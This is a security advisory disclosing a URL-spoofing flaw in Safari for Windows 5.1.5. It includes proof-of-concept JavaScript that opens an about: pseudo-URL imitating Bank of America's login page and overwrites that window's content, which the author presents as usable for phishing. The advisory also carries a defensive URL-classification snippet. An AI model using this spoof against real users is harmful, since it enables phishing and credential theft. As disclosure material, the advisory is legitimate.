###########################################
Safari for windows 5.1.5 and prior URL window.open() spoof
Vendor URL: http://www.apple.com
Advisory: http://lostmon.blogspot.com/2012/03/safari-for-windows-515-and-prior-and.html
Vendor Notify: YES
Exploit available: YES
##########################################

##############
History:
##############

Safari has serious issues with protocol handlers. Over a long time, across different protocols and handlers, I have reported four or five vulnerabilities in protocol handlers. I had reported a telnet issue in Safari for Windows, which Apple patched in silence.

Today I downloaded and tested Safari for Windows 5.1.5 only to see whether the vulnerability that I reported in 03/2012 is patched. See => http://lostmon.blogspot.com/2012/03/safari-for-windows-and-ios-url-weakness.html

Safari for Windows 5.1.5 has the same vulnerability, ummm....

############
Description
############

Safari set the bar higher for web browsers. It introduced sophisticated design elements that made browsing a joy. Easy to use, Safari stayed out of your way and let you effortlessly navigate from site to site.

Safari for Windows ignores which protocol handler is used: it doesn't check whether the protocol is registered, or simply doesn't check any handler. In the case I am describing, a pseudo URL spoof is possible. Let's look at some examples to understand the nature of this vulnerability.

Case "about:" protocol handler.

Type "about:blank" in the address bar and it shows the about:blank page. This is what we expect, and this template is OK.

Type "about:something" in the address bar and the title and URL show the same (about:something).

Type "about:http://www.bankofamerica.com" and the title shows the same...

Now the best thing is to write a title that simulates the title of the original page and write some content in this window (about:http://www.bankofamerica.com). The URL shows it, but in reality we are on the about:blank page...
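The check that the Description says Safari skips can be sketched as below. This is an added example, not code from the advisory or from Apple; the function name classifyTarget, the scheme allowlist and the example.test URLs are assumptions constructed for illustration.

```javascript
// Added example: classify a URL string before it is opened or shown in a URL bar.
// KNOWN_SCHEMES and ALLOWED_ABOUT are assumed allowlists, not Safari's real tables.
const KNOWN_SCHEMES = new Set(["http:", "https:", "about:", "data:", "mailto:"]);
const ALLOWED_ABOUT = new Set(["blank", "srcdoc"]);
// An opaque path that itself starts like a URL ("scheme://" or "www.").
const EMBEDDED_URL = /^(?:[a-z][a-z0-9+.-]*:\/\/|www\.)/i;

function classifyTarget(input) {
  let url;
  try {
    url = new URL(input); // WHATWG parser: everything before the first ":" is the scheme
  } catch (e) {
    return "invalid";
  }
  // A hostname-looking prefix such as "www.example.test:" parses as a scheme,
  // so it is caught here as a handler nobody registered.
  if (!KNOWN_SCHEMES.has(url.protocol)) return "unregistered-scheme";
  if (url.protocol === "about:") {
    if (ALLOWED_ABOUT.has(url.pathname)) return "ok";
    // about:<anything else> renders a blank document while displaying <anything else>.
    return EMBEDDED_URL.test(url.pathname) ? "embedded-url-in-about" : "unknown-about-page";
  }
  return "ok";
}

// Return only the targets that should be refused, with the reason for each.
function rejectedTargets(inputs) {
  return inputs
    .map((input) => ({ input, verdict: classifyTarget(input) }))
    .filter((entry) => entry.verdict !== "ok");
}

// Constructed sample inputs (not taken from real traffic).
const SAMPLES = [
  "about:blank",
  "about:something",
  "about:http://www.example.test/login",
  "www.example.test:http://login",
  "https://www.example.test/login",
];
console.log(rejectedTargets(SAMPLES));
```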

############
PoC's
############

Create a function to open a new window and write the location...

    var wx;
    function invokePoC() {
      // Open a named window on the pseudo URL; the page loaded is really about:blank
      wx = open("about:http://www.bankofamerica.com/login","newwin");
      setInterval("doit()",1);
    }

And create a function to write in the result window.

    function doit() {
      // Rewrite the title and body of the opened window
      wx.document.open();
      wx.document.write("<title>spoof title</title>Hello !! i'm a Spoofed Site !!!");
    }

With this, a remote attacker can carry out spoofing or phishing attacks. But given that Safari has issues with handlers, the best attack is to drop the about: protocol handler and simulate bankofamerica, for example: we can concatenate a www as a handler and concatenate the http: handler to get a nice URL :)

##########################
Safari for windows URL Spoof
##########################

This PoC simulates the Bank of America URL and content. The image is embedded via the data: scheme.

Safari for windows 5.1.5 and prior URL spoof window.open() test case.

Safari for windows 5.1.5 and prior URL pseudo-spoof window.open() test case.

First click on this link ==> invoke PoC

Then look at the result window: the address bar shows the URL, and if you type any URL in the address bar, the browser can't navigate to it. This issue can be used for site spoofing or phishing attacks.

Vulnerable: Safari for Windows 5.1.5 and prior versions. Safari for iOS is vulnerable too.

####################### €Nd ######################

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....